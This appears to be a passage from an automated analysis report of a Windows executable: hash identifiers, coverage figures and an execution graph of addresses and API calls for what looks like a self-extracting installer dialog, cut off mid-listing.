                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                  • String ID: [8
                                                                                                  • API String ID: 3761405300-2721712938
                                                                                                  • Opcode ID: 64d649c16ed6e8c6f25994a8446dd4fa7031026e2171dcf6af3124bc4473c21b
                                                                                                  • Instruction ID: 495fe3f95e2027d546a8fca6151223715c73acdfde9eef9bbb0c629ffc8d6002
                                                                                                  • Opcode Fuzzy Hash: 64d649c16ed6e8c6f25994a8446dd4fa7031026e2171dcf6af3124bc4473c21b
                                                                                                  • Instruction Fuzzy Hash: 9B21E0B9A182009ED326DF16E959B447BF4FB98344F14407EE505CB3A8D7B0A881DB64

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:11.9%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:14.7%
                                                                                                  Total number of Nodes:2000
                                                                                                  Total number of Limit Nodes:26
                                                                                                  execution_graph 25950 7ff6c16e11cf 25951 7ff6c16e1102 25950->25951 25953 7ff6c16e1900 25951->25953 25979 7ff6c16e1558 25953->25979 25956 7ff6c16e198b 25957 7ff6c16e1868 DloadReleaseSectionWriteAccess 6 API calls 25956->25957 25958 7ff6c16e1998 RaiseException 25957->25958 25959 7ff6c16e1bb5 25958->25959 25959->25951 25960 7ff6c16e19b4 25961 7ff6c16e1a3d LoadLibraryExA 25960->25961 25962 7ff6c16e1b85 25960->25962 25964 7ff6c16e1aa9 25960->25964 25965 7ff6c16e1abd 25960->25965 25963 7ff6c16e1a54 GetLastError 25961->25963 25961->25964 25987 7ff6c16e1868 25962->25987 25967 7ff6c16e1a7e 25963->25967 25968 7ff6c16e1a69 25963->25968 25964->25965 25969 7ff6c16e1ab4 FreeLibrary 25964->25969 25965->25962 25966 7ff6c16e1b1b GetProcAddress 25965->25966 25966->25962 25972 7ff6c16e1b30 GetLastError 25966->25972 25971 7ff6c16e1868 DloadReleaseSectionWriteAccess 6 API calls 25967->25971 25968->25964 25968->25967 25969->25965 25973 7ff6c16e1a8b RaiseException 25971->25973 25974 7ff6c16e1b45 25972->25974 25973->25959 25974->25962 25975 7ff6c16e1868 DloadReleaseSectionWriteAccess 6 API calls 25974->25975 25976 7ff6c16e1b67 RaiseException 25975->25976 25977 7ff6c16e1558 _com_raise_error 6 API calls 25976->25977 25978 7ff6c16e1b81 25977->25978 25978->25962 25980 7ff6c16e156e 25979->25980 25986 7ff6c16e15d3 25979->25986 25995 7ff6c16e1604 25980->25995 25983 7ff6c16e15ce 25984 7ff6c16e1604 DloadReleaseSectionWriteAccess 3 API calls 25983->25984 25984->25986 25986->25956 25986->25960 25988 7ff6c16e18d1 25987->25988 25989 7ff6c16e1878 25987->25989 25988->25959 25990 7ff6c16e1604 DloadReleaseSectionWriteAccess 3 API calls 25989->25990 25991 7ff6c16e187d 25990->25991 25992 7ff6c16e18cc 25991->25992 25993 7ff6c16e17d8 DloadProtectSection 3 API calls 25991->25993 25994 7ff6c16e1604 DloadReleaseSectionWriteAccess 3 API calls 25992->25994 25993->25992 25994->25988 25996 7ff6c16e161f 25995->25996 25998 7ff6c16e1573 25995->25998 25997 7ff6c16e1624 GetModuleHandleW 25996->25997 25996->25998 25999 7ff6c16e163e GetProcAddress 25997->25999 26000 7ff6c16e1639 25997->26000 25998->25983 26002 7ff6c16e17d8 25998->26002 25999->26000 26001 7ff6c16e1653 GetProcAddress 25999->26001 26000->25998 26001->26000 26003 7ff6c16e17fa DloadProtectSection 26002->26003 26004 7ff6c16e1802 26003->26004 26005 7ff6c16e183a VirtualProtect 26003->26005 26007 7ff6c16e16a4 VirtualQuery GetSystemInfo 26003->26007 26004->25983 26005->26004 26007->26005 26008 7ff6c16e1491 26009 7ff6c16e13c9 26008->26009 26009->26008 26010 7ff6c16e1900 _com_raise_error 14 API calls 26009->26010 26010->26009 26011 7ff6c16e20f0 26012 7ff6c16e2106 _com_error::_com_error 26011->26012 26017 7ff6c16e4078 26012->26017 26014 7ff6c16e2117 26015 7ff6c16e1900 _com_raise_error 14 API calls 26014->26015 26016 7ff6c16e2163 26015->26016 26018 7ff6c16e40b4 RtlPcToFileHeader 26017->26018 26019 7ff6c16e4097 26017->26019 26020 7ff6c16e40db RaiseException 26018->26020 26021 7ff6c16e40cc 26018->26021 26019->26018 26020->26014 26021->26020 26022 7ff6c16db190 26365 7ff6c16b255c 26022->26365 26024 7ff6c16db1db 26025 7ff6c16dbe93 26024->26025 26026 7ff6c16db1ef 26024->26026 26176 7ff6c16db20c 26024->26176 26650 7ff6c16df390 26025->26650 26029 7ff6c16db1ff 26026->26029 26030 7ff6c16db2db 26026->26030 26026->26176 26034 7ff6c16db207 26029->26034 26035 7ff6c16db2a9 26029->26035 26037 7ff6c16db391 26030->26037 26038 7ff6c16db2f5 26030->26038 26032 7ff6c16dbeba IsDlgButtonChecked 26033 7ff6c16dbec9 26032->26033 26040 7ff6c16dbed5 SendDlgItemMessageW 26033->26040 26041 7ff6c16dbef0 GetDlgItem IsDlgButtonChecked 26033->26041 26046 7ff6c16caae0 48 API calls 26034->26046 26034->26176 26042 7ff6c16db2cb EndDialog 26035->26042 26035->26176 26373 7ff6c16b22bc GetDlgItem 26037->26373 26043 7ff6c16caae0 48 API calls 26038->26043 26040->26041 26669 7ff6c16c62dc GetCurrentDirectoryW 26041->26669 26042->26176 26047 7ff6c16db313 SetDlgItemTextW 26043->26047 26050 7ff6c16db236 26046->26050 26053 7ff6c16db326 26047->26053 26048 7ff6c16db3b1 EndDialog 26225 7ff6c16db3da 26048->26225 26049 7ff6c16dbf47 GetDlgItem 26679 7ff6c16b2520 26049->26679 26683 7ff6c16b1ec4 34 API calls _handle_error 26050->26683 26052 7ff6c16db408 GetDlgItem 26057 7ff6c16db422 IsDlgButtonChecked IsDlgButtonChecked 26052->26057 26058 7ff6c16db44f SetFocus 26052->26058 26062 7ff6c16db340 GetMessageW 26053->26062 26053->26176 26056 7ff6c16db246 26061 7ff6c16db25c 26056->26061 26684 7ff6c16b250c 26056->26684 26057->26058 26063 7ff6c16db4f2 26058->26063 26064 7ff6c16db465 26058->26064 26079 7ff6c16dc363 26061->26079 26061->26176 26068 7ff6c16db35e IsDialogMessageW 26062->26068 26062->26176 26387 7ff6c16b8d04 26063->26387 26069 7ff6c16caae0 48 API calls 26064->26069 26068->26053 26074 7ff6c16db373 TranslateMessage DispatchMessageW 26068->26074 26075 7ff6c16db46f 26069->26075 26070 7ff6c16dbcc5 26076 7ff6c16caae0 48 API calls 26070->26076 26071 7ff6c16b1fa0 31 API calls 26071->26176 26073 7ff6c16db52c 26397 7ff6c16def80 26073->26397 26074->26053 26687 7ff6c16b129c 26075->26687 26080 7ff6c16dbcd6 SetDlgItemTextW 26076->26080 26744 7ff6c16e7904 26079->26744 26083 7ff6c16caae0 48 API calls 26080->26083 26089 7ff6c16dbd08 26083->26089 26101 7ff6c16b129c 33 API calls 26089->26101 26090 7ff6c16dc368 26094 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26090->26094 26093 7ff6c16db498 26098 7ff6c16df0a4 24 API calls 26093->26098 26102 7ff6c16dc36e 26094->26102 26107 7ff6c16db4a5 26098->26107 26130 7ff6c16dbd31 26101->26130 26113 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26102->26113 26107->26090 26121 7ff6c16db4e8 26107->26121 26112 7ff6c16dbdda 26122 7ff6c16caae0 48 API calls 26112->26122 26123 7ff6c16dc374 26113->26123 26120 7ff6c16db5ec 26133 7ff6c16db61a 26120->26133 26698 7ff6c16c32a8 26120->26698 26121->26120 26697 7ff6c16dfa80 33 API calls 2 library calls 26121->26697 26135 7ff6c16dbde4 26122->26135 26141 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26123->26141 26127 7ff6c16b1fa0 31 API calls 26128 7ff6c16db586 26127->26128 26128->26102 26128->26121 26130->26112 26142 7ff6c16b129c 33 API calls 26130->26142 26435 7ff6c16c2f58 26133->26435 26153 7ff6c16b129c 33 API calls 26135->26153 26147 7ff6c16dc37a 26141->26147 26148 7ff6c16dbd7f 26142->26148 26159 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26147->26159 26155 7ff6c16caae0 48 API calls 26148->26155 26151 7ff6c16db634 GetLastError 26152 7ff6c16db64c 26151->26152 26447 7ff6c16c7fc4 26152->26447 26158 7ff6c16dbe0d 26153->26158 26160 7ff6c16dbd8a 26155->26160 26157 7ff6c16db60e 26701 7ff6c16d9d90 12 API calls _handle_error 26157->26701 26173 7ff6c16b129c 33 API calls 26158->26173 26164 7ff6c16dc380 26159->26164 26166 7ff6c16b1150 33 API calls 26160->26166 26174 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26164->26174 26169 7ff6c16dbda2 26166->26169 26168 7ff6c16db65e 26171 7ff6c16db665 GetLastError 26168->26171 26172 7ff6c16db674 26168->26172 26731 7ff6c16b2034 26169->26731 26171->26172 26180 7ff6c16db72b 26172->26180 26182 7ff6c16db68b GetTickCount 26172->26182 26268 7ff6c16db71c 26172->26268 26177 7ff6c16dbe4e 26173->26177 26178 7ff6c16dc386 26174->26178 26735 7ff6c16e2320 26176->26735 26188 7ff6c16b1fa0 31 API calls 26177->26188 26183 7ff6c16b255c 61 API calls 26178->26183 26184 7ff6c16dba50 26180->26184 26702 7ff6c16c6454 26180->26702 26450 7ff6c16b4228 26182->26450 26189 7ff6c16dc3e4 26183->26189 26184->26048 26726 7ff6c16bbd0c 33 API calls 26184->26726 26185 7ff6c16dbdbe 26193 7ff6c16b1fa0 31 API calls 26185->26193 26197 7ff6c16dbe78 26188->26197 26190 7ff6c16dc3e8 26189->26190 26198 7ff6c16dc489 GetDlgItem SetFocus 26189->26198 26226 7ff6c16dc3fd 26189->26226 26204 7ff6c16e2320 _handle_error 8 API calls 26190->26204 26200 7ff6c16dbdcc 26193->26200 26195 7ff6c16dbb79 26210 7ff6c16caae0 48 API calls 26195->26210 26196 7ff6c16dba75 26727 7ff6c16b1150 26196->26727 26203 7ff6c16b1fa0 31 API calls 26197->26203 26208 7ff6c16dc4ba 26198->26208 26199 7ff6c16db74e 26714 7ff6c16cb914 102 API calls 26199->26714 26207 7ff6c16b1fa0 31 API calls 26200->26207 26212 7ff6c16dbe83 26203->26212 26213 7ff6c16dca97 26204->26213 26207->26112 26222 7ff6c16b129c 33 API calls 26208->26222 26209 7ff6c16db6ba 26460 7ff6c16b1fa0 26209->26460 26217 7ff6c16dbba7 SetDlgItemTextW 26210->26217 26211 7ff6c16dba8a 26218 7ff6c16caae0 48 API calls 26211->26218 26219 7ff6c16b1fa0 31 API calls 26212->26219 26214 7ff6c16db768 26221 7ff6c16cda98 48 API calls 26214->26221 26216 7ff6c16db6c8 26465 7ff6c16c2134 26216->26465 26223 7ff6c16b2534 26217->26223 26224 7ff6c16dba97 26218->26224 26219->26225 26220 7ff6c16dc434 SendDlgItemMessageW 26227 7ff6c16dc454 26220->26227 26228 7ff6c16dc45d EndDialog 26220->26228 26229 7ff6c16db7aa GetCommandLineW 26221->26229 26230 7ff6c16dc4cc 26222->26230 26231 7ff6c16dbbc5 SetDlgItemTextW GetDlgItem 26223->26231 26232 7ff6c16b1150 33 API calls 26224->26232 26225->26071 26226->26190 26226->26220 26227->26228 26228->26190 26233 7ff6c16db84f 26229->26233 26234 7ff6c16db869 26229->26234 26749 7ff6c16c80d8 33 API calls 26230->26749 26237 7ff6c16dbc13 26231->26237 26238 7ff6c16dbbf0 GetWindowLongPtrW SetWindowLongPtrW 26231->26238 26239 7ff6c16dbaaa 26232->26239 26715 7ff6c16b20b0 26233->26715 26719 7ff6c16dab54 33 API calls _handle_error 26234->26719 26485 7ff6c16dce88 26237->26485 26238->26237 26244 7ff6c16b1fa0 31 API calls 26239->26244 26240 7ff6c16dc4e0 26245 7ff6c16b250c SetDlgItemTextW 26240->26245 26250 7ff6c16dbab5 26244->26250 26252 7ff6c16dc4f4 26245->26252 26246 7ff6c16db87a 26720 7ff6c16dab54 33 API calls _handle_error 26246->26720 26247 7ff6c16db6f5 GetLastError 26248 7ff6c16db704 26247->26248 26481 7ff6c16c204c 26248->26481 26256 7ff6c16b1fa0 31 API calls 26250->26256 26261 7ff6c16dc526 SendDlgItemMessageW FindFirstFileW 26252->26261 26255 7ff6c16dce88 160 API calls 26259 7ff6c16dbc3c 26255->26259 26260 7ff6c16dbac3 26256->26260 26257 7ff6c16db88b 26721 7ff6c16dab54 33 API calls _handle_error 26257->26721 26635 7ff6c16df974 26259->26635 26273 7ff6c16caae0 48 API calls 26260->26273 26265 7ff6c16dc57b 26261->26265 26358 7ff6c16dca04 26261->26358 26274 7ff6c16caae0 48 API calls 26265->26274 26266 7ff6c16db89c 26722 7ff6c16cb9b4 102 API calls 26266->26722 26268->26180 26268->26195 26270 7ff6c16db8b3 26723 7ff6c16dfbdc 33 API calls 26270->26723 26271 7ff6c16dca81 26271->26190 26272 7ff6c16dce88 160 API calls 26287 7ff6c16dbc6a 26272->26287 26277 7ff6c16dbadb 26273->26277 26278 7ff6c16dc59e 26274->26278 26276 7ff6c16dcaa9 26280 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26276->26280 26288 7ff6c16b129c 33 API calls 26277->26288 26290 7ff6c16b129c 33 API calls 26278->26290 26279 7ff6c16db8d2 CreateFileMappingW 26282 7ff6c16db953 ShellExecuteExW 26279->26282 26283 7ff6c16db911 MapViewOfFile 26279->26283 26284 7ff6c16dcaae 26280->26284 26281 7ff6c16dbc96 26649 7ff6c16b2298 GetDlgItem EnableWindow 26281->26649 26305 7ff6c16db974 26282->26305 26724 7ff6c16e3640 26283->26724 26291 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26284->26291 26287->26281 26292 7ff6c16dce88 160 API calls 26287->26292 26300 7ff6c16dbb04 26288->26300 26289 7ff6c16db3f5 26289->26048 26289->26070 26293 7ff6c16dc5cd 26290->26293 26294 7ff6c16dcab4 26291->26294 26292->26281 26295 7ff6c16b1150 33 API calls 26293->26295 26298 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26294->26298 26296 7ff6c16dc5e8 26295->26296 26750 7ff6c16be164 33 API calls 2 library calls 26296->26750 26297 7ff6c16db9c3 26306 7ff6c16db9ef 26297->26306 26307 7ff6c16db9dc UnmapViewOfFile CloseHandle 26297->26307 26302 7ff6c16dcaba 26298->26302 26299 7ff6c16dbb5a 26303 7ff6c16b1fa0 31 API calls 26299->26303 26300->26147 26300->26299 26310 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26302->26310 26303->26048 26304 7ff6c16dc5ff 26308 7ff6c16b1fa0 31 API calls 26304->26308 26305->26297 26312 7ff6c16db9b1 Sleep 26305->26312 26306->26123 26309 7ff6c16dba25 26306->26309 26307->26306 26311 7ff6c16dc60c 26308->26311 26314 7ff6c16b1fa0 31 API calls 26309->26314 26313 7ff6c16dcac0 26310->26313 26311->26284 26316 7ff6c16b1fa0 31 API calls 26311->26316 26312->26297 26312->26305 26317 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26313->26317 26315 7ff6c16dba42 26314->26315 26318 7ff6c16b1fa0 31 API calls 26315->26318 26319 7ff6c16dc673 26316->26319 26320 7ff6c16dcac6 26317->26320 26318->26184 26321 7ff6c16b250c SetDlgItemTextW 26319->26321 26323 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26320->26323 26322 7ff6c16dc687 FindClose 26321->26322 26324 7ff6c16dc6a3 26322->26324 26325 7ff6c16dc797 SendDlgItemMessageW 26322->26325 26326 7ff6c16dcacc 26323->26326 26751 7ff6c16da2cc 10 API calls _handle_error 26324->26751 26327 7ff6c16dc7cb 26325->26327 26330 7ff6c16caae0 48 API calls 26327->26330 26329 7ff6c16dc6c6 26331 7ff6c16caae0 48 API calls 26329->26331 26332 7ff6c16dc7d8 26330->26332 26333 7ff6c16dc6cf 26331->26333 26335 7ff6c16b129c 33 API calls 26332->26335 26334 7ff6c16cda98 48 API calls 26333->26334 26338 7ff6c16dc6ec memcpy_s 26334->26338 26337 7ff6c16dc807 26335->26337 26336 7ff6c16b1fa0 31 API calls 26339 7ff6c16dc783 26336->26339 26340 7ff6c16b1150 33 API calls 26337->26340 26338->26294 26338->26336 26341 7ff6c16b250c SetDlgItemTextW 26339->26341 26342 7ff6c16dc822 26340->26342 26341->26325 26752 7ff6c16be164 33 API calls 2 library calls 26342->26752 26344 7ff6c16dc839 26345 7ff6c16b1fa0 31 API calls 26344->26345 26346 7ff6c16dc845 memcpy_s 26345->26346 26347 7ff6c16b1fa0 31 API calls 26346->26347 26348 7ff6c16dc87f 26347->26348 26349 7ff6c16b1fa0 31 API calls 26348->26349 26350 7ff6c16dc88c 26349->26350 26350->26302 26351 7ff6c16b1fa0 31 API calls 26350->26351 26352 7ff6c16dc8f3 26351->26352 26353 7ff6c16b250c SetDlgItemTextW 26352->26353 26354 7ff6c16dc907 26353->26354 26354->26358 26753 7ff6c16da2cc 10 API calls _handle_error 26354->26753 26356 7ff6c16dc932 26357 7ff6c16caae0 48 API calls 26356->26357 26359 7ff6c16dc93c 26357->26359 26358->26190 26358->26271 26358->26276 26358->26320 26360 7ff6c16cda98 48 API calls 26359->26360 26362 7ff6c16dc959 memcpy_s 26360->26362 26361 7ff6c16b1fa0 31 API calls 26363 7ff6c16dc9f0 26361->26363 26362->26313 26362->26361 26364 7ff6c16b250c SetDlgItemTextW 26363->26364 26364->26358 26366 7ff6c16b25d0 26365->26366 26367 7ff6c16b256a 26365->26367 26366->26024 26367->26366 26754 7ff6c16ca4ac 26367->26754 26369 7ff6c16b258f 26369->26366 26370 7ff6c16b25a4 GetDlgItem 26369->26370 26370->26366 26371 7ff6c16b25b7 26370->26371 26371->26366 26372 7ff6c16b25be SetDlgItemTextW 26371->26372 26372->26366 26374 7ff6c16b2334 26373->26374 26375 7ff6c16b22fc 26373->26375 26853 7ff6c16b23f8 GetWindowTextLengthW 26374->26853 26377 7ff6c16b129c 33 API calls 26375->26377 26378 7ff6c16b232a memcpy_s 26377->26378 26379 7ff6c16b2389 26378->26379 26380 7ff6c16b1fa0 31 API calls 26378->26380 26382 7ff6c16b23c8 26379->26382 26384 7ff6c16b23f0 26379->26384 26380->26379 26381 7ff6c16e2320 _handle_error 8 API calls 26383 7ff6c16b23dd 26381->26383 26382->26381 26383->26048 26383->26052 26383->26289 26385 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26384->26385 26386 7ff6c16b23f5 26385->26386 26388 7ff6c16b8d34 26387->26388 26395 7ff6c16b8de8 26387->26395 26389 7ff6c16b8d42 memcpy_s 26388->26389 26392 7ff6c16b8de3 26388->26392 26394 7ff6c16b8d91 26388->26394 26389->26073 26897 7ff6c16b1f80 33 API calls 3 library calls 26392->26897 26394->26389 26396 7ff6c16e21d0 33 API calls 26394->26396 26898 7ff6c16b2004 33 API calls std::_Xinvalid_argument 26395->26898 26396->26389 26401 7ff6c16defb0 26397->26401 26398 7ff6c16defd7 26399 7ff6c16e2320 _handle_error 8 API calls 26398->26399 26400 7ff6c16db537 26399->26400 26411 7ff6c16caae0 26400->26411 26401->26398 26899 7ff6c16bbd0c 33 API calls 26401->26899 26403 7ff6c16df02a 26404 7ff6c16b1150 33 API calls 26403->26404 26405 7ff6c16df03f 26404->26405 26407 7ff6c16b1fa0 31 API calls 26405->26407 26409 7ff6c16df04f memcpy_s 26405->26409 26406 7ff6c16b1fa0 31 API calls 26408 7ff6c16df076 26406->26408 26407->26409 26410 7ff6c16b1fa0 31 API calls 26408->26410 26409->26406 26410->26398 26412 7ff6c16caaf3 26411->26412 26900 7ff6c16c9774 26412->26900 26415 7ff6c16cab86 26418 7ff6c16cda98 26415->26418 26416 7ff6c16cab58 LoadStringW 26416->26415 26417 7ff6c16cab71 LoadStringW 26416->26417 26417->26415 26919 7ff6c16cd874 26418->26919 26421 7ff6c16df0a4 26953 7ff6c16dae1c PeekMessageW 26421->26953 26424 7ff6c16df143 IsDlgButtonChecked IsDlgButtonChecked 26426 7ff6c16df1a4 IsDlgButtonChecked 26424->26426 26427 7ff6c16df189 26424->26427 26425 7ff6c16df0f5 26428 7ff6c16df101 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 26425->26428 26429 7ff6c16df1c3 26426->26429 26430 7ff6c16df1c6 IsDlgButtonChecked IsDlgButtonChecked 26426->26430 26427->26426 26428->26424 26429->26430 26431 7ff6c16df1f3 IsDlgButtonChecked 26430->26431 26432 7ff6c16df218 IsDlgButtonChecked 26430->26432 26431->26432 26433 7ff6c16e2320 _handle_error 8 API calls 26432->26433 26434 7ff6c16db578 26433->26434 26434->26127 26436 7ff6c16c309d 26435->26436 26442 7ff6c16c2f8e 26435->26442 26437 7ff6c16e2320 _handle_error 8 API calls 26436->26437 26438 7ff6c16c30b3 26437->26438 26438->26151 26438->26152 26439 7ff6c16c3077 26439->26436 26440 7ff6c16c3684 56 API calls 26439->26440 26440->26436 26441 7ff6c16b129c 33 API calls 26441->26442 26442->26439 26442->26441 26444 7ff6c16c30c8 26442->26444 26958 7ff6c16c3684 26442->26958 26445 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26444->26445 26446 7ff6c16c30cd 26445->26446 26448 7ff6c16c7fcf 26447->26448 26449 7ff6c16c7fd2 SetCurrentDirectoryW 26447->26449 26448->26449 26449->26168 26451 7ff6c16b4255 26450->26451 26452 7ff6c16b426a 26451->26452 26453 7ff6c16b129c 33 API calls 26451->26453 26454 7ff6c16e2320 _handle_error 8 API calls 26452->26454 26453->26452 26455 7ff6c16b42a1 26454->26455 26456 7ff6c16b3c84 26455->26456 26457 7ff6c16b3cab 26456->26457 27106 7ff6c16b710c 26457->27106 26459 7ff6c16b3cbb memcpy_s 26459->26209 26461 7ff6c16b1fb3 26460->26461 26462 7ff6c16b1fdc 26460->26462 26461->26462 26463 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26461->26463 26462->26216 26464 7ff6c16b2000 26463->26464 26468 7ff6c16c216a 26465->26468 26466 7ff6c16c219e 26469 7ff6c16c227f 26466->26469 26471 7ff6c16c6a0c 49 API calls 26466->26471 26467 7ff6c16c21b1 CreateFileW 26467->26466 26468->26466 26468->26467 26470 7ff6c16c22af 26469->26470 26474 7ff6c16b20b0 33 API calls 26469->26474 26472 7ff6c16e2320 _handle_error 8 API calls 26470->26472 26473 7ff6c16c2209 26471->26473 26475 7ff6c16c22c4 26472->26475 26476 7ff6c16c2246 26473->26476 26477 7ff6c16c220d CreateFileW 26473->26477 26474->26470 26475->26247 26475->26248 26476->26469 26478 7ff6c16c22d8 26476->26478 26477->26476 26479 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26478->26479 26480 7ff6c16c22dd 26479->26480 26482 7ff6c16c2066 26481->26482 26483 7ff6c16c2072 26481->26483 26482->26483 27118 7ff6c16c20d0 26482->27118 27125 7ff6c16daa08 26485->27125 26487 7ff6c16dd1ee 26488 7ff6c16b1fa0 31 API calls 26487->26488 26489 7ff6c16dd1f7 26488->26489 26490 7ff6c16e2320 _handle_error 8 API calls 26489->26490 26491 7ff6c16dbc2b 26490->26491 26491->26255 26492 7ff6c16deefa 27257 7ff6c16b704c 47 API calls memcpy_s 26492->27257 26495 7ff6c16def00 27258 7ff6c16b704c 47 API calls memcpy_s 26495->27258 26496 7ff6c16cd22c 33 API calls 26634 7ff6c16dcf03 memcpy_s 26496->26634 26498 7ff6c16def06 26502 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26498->26502 26500 7ff6c16deeee 26501 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26500->26501 26503 7ff6c16deef4 26501->26503 26504 7ff6c16def0c 26502->26504 27256 7ff6c16b704c 47 API calls memcpy_s 26503->27256 26507 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26504->26507 26509 7ff6c16def12 26507->26509 26508 7ff6c16dee4a 26510 7ff6c16deed2 26508->26510 26511 7ff6c16b20b0 33 API calls 26508->26511 26514 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26509->26514 27254 7ff6c16b1f80 33 API calls 3 library calls 26510->27254 26516 7ff6c16dee77 26511->26516 26512 7ff6c16deee8 27255 7ff6c16b2004 33 API calls std::_Xinvalid_argument 26512->27255 26513 7ff6c16b13a4 33 API calls 26517 7ff6c16ddc3a GetTempPathW 26513->26517 26518 7ff6c16def18 26514->26518 27253 7ff6c16dabe8 33 API calls 3 library calls 26516->27253 26517->26634 26525 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26518->26525 26519 7ff6c16c62dc 35 API calls 26519->26634 26523 7ff6c16dee8d 26531 7ff6c16b1fa0 31 API calls 26523->26531 26534 7ff6c16deea4 memcpy_s 26523->26534 26524 7ff6c16b2520 SetDlgItemTextW 26524->26634 26529 7ff6c16def1e 26525->26529 26528 7ff6c16ebb8c 43 API calls 26528->26634 26536 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26529->26536 26530 7ff6c16de7f3 26530->26510 26530->26512 26533 7ff6c16e21d0 33 API calls 26530->26533 26544 7ff6c16de83b memcpy_s 26530->26544 26531->26534 26532 7ff6c16b1fa0 31 API calls 26532->26510 26533->26544 26534->26532 26535 7ff6c16c5aa8 33 API calls 26535->26634 26538 7ff6c16def24 26536->26538 26537 7ff6c16daa08 33 API calls 26537->26634 26542 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26538->26542 26540 7ff6c16b2034 33 API calls 26540->26634 26541 7ff6c16def6c 27261 7ff6c16b2004 33 API calls std::_Xinvalid_argument 26541->27261 26549 7ff6c16def2a 26542->26549 26543 7ff6c16c3f30 54 API calls 26543->26634 26553 7ff6c16b20b0 33 API calls 26544->26553 26592 7ff6c16deb8f 26544->26592 26546 7ff6c16b1fa0 31 API calls 26546->26508 26547 7ff6c16def78 27263 7ff6c16b2004 33 API calls std::_Xinvalid_argument 26547->27263 26548 7ff6c16b4228 33 API calls 26548->26634 26560 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26549->26560 26550 7ff6c16def72 27262 7ff6c16b1f80 33 API calls 3 library calls 26550->27262 26552 7ff6c16def66 27260 7ff6c16b1f80 33 API calls 3 library calls 26552->27260 26561 7ff6c16de963 26553->26561 26555 7ff6c16b8d04 33 API calls 26555->26634 26558 7ff6c16dec2a 26558->26541 26558->26552 26569 7ff6c16dec72 memcpy_s 26558->26569 26575 7ff6c16ded3b memcpy_s 26558->26575 26577 7ff6c16e21d0 33 API calls 26558->26577 26559 7ff6c16b2674 31 API calls 26559->26634 26566 7ff6c16def30 26560->26566 26568 7ff6c16def60 26561->26568 26576 7ff6c16b129c 33 API calls 26561->26576 26564 7ff6c16ded40 26564->26547 26564->26550 26564->26575 26581 7ff6c16e21d0 33 API calls 26564->26581 26565 7ff6c16be164 33 API calls 26565->26634 26582 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26566->26582 26567 7ff6c16c3d34 51 API calls 26567->26634 27259 7ff6c16b704c 47 API calls memcpy_s 26568->27259 27168 7ff6c16df4e0 26569->27168 26571 7ff6c16dd5e9 GetDlgItem 26578 7ff6c16b2520 SetDlgItemTextW 26571->26578 26572 7ff6c16cdc2c 33 API calls 26572->26634 26574 7ff6c16d99c8 31 API calls 26574->26634 26575->26546 26583 7ff6c16de9a6 26576->26583 26577->26569 26584 7ff6c16dd608 IsDlgButtonChecked 26578->26584 26581->26575 26585 7ff6c16def36 26582->26585 27249 7ff6c16cd22c 26583->27249 26584->26634 26589 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26585->26589 26588 7ff6c16c5b60 53 API calls 26588->26634 26591 7ff6c16def3c 26589->26591 26590 7ff6c16dd63c IsDlgButtonChecked 26590->26634 26596 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26591->26596 26592->26558 26592->26564 26598 7ff6c16def54 26592->26598 26600 7ff6c16def5a 26592->26600 26599 7ff6c16def42 26596->26599 26601 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26598->26601 26605 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26599->26605 26604 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26600->26604 26601->26600 26602 7ff6c16d13c4 CompareStringW 26621 7ff6c16de9d1 26602->26621 26603 7ff6c16b1744 33 API calls 26603->26634 26604->26568 26608 7ff6c16def48 26605->26608 26606 7ff6c16c5820 33 API calls 26606->26634 26607 7ff6c16c32a8 51 API calls 26607->26634 26609 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26608->26609 26611 7ff6c16def4e 26609->26611 26610 7ff6c16b250c SetDlgItemTextW 26610->26634 26615 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26611->26615 26613 7ff6c16b1150 33 API calls 26613->26634 26615->26598 26617 7ff6c16b1fa0 31 API calls 26617->26621 26618 7ff6c16b129c 33 API calls 26618->26621 26620 7ff6c16b129c 33 API calls 26620->26634 26621->26592 26621->26602 26621->26608 26621->26611 26621->26617 26621->26618 26626 7ff6c16cd22c 33 API calls 26621->26626 26622 7ff6c16b1fa0 31 API calls 26622->26634 26623 7ff6c16ddf99 EndDialog 26623->26634 26625 7ff6c16c32bc 51 API calls 26625->26634 26626->26621 26627 7ff6c16ddb21 MoveFileW 26628 7ff6c16ddb55 MoveFileExW 26627->26628 26629 7ff6c16ddb70 26627->26629 26628->26629 26630 7ff6c16b1fa0 31 API calls 26629->26630 26629->26634 26630->26629 26631 7ff6c16b20b0 33 API calls 26631->26634 26632 